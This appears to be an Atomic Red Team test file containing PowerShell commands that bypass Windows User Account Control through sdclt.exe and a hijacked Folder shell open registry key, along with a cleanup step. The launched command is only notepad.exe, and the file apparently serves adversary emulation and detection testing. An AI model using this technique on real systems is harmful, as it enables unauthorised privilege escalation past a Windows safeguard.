#TechniqueName: Abuse Elevation Control Mechanism: Bypass User Access Control
#AtomicTestName: Bypass UAC using sdclt DelegateExecute
#Language: ps1

#commands
New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value 'cmd.exe /c notepad.exe'
New-ItemProperty -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute"
Start-Process -FilePath $env:windir\system32\sdclt.exe
Start-Sleep -s 3


#cleanup_commands
Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore

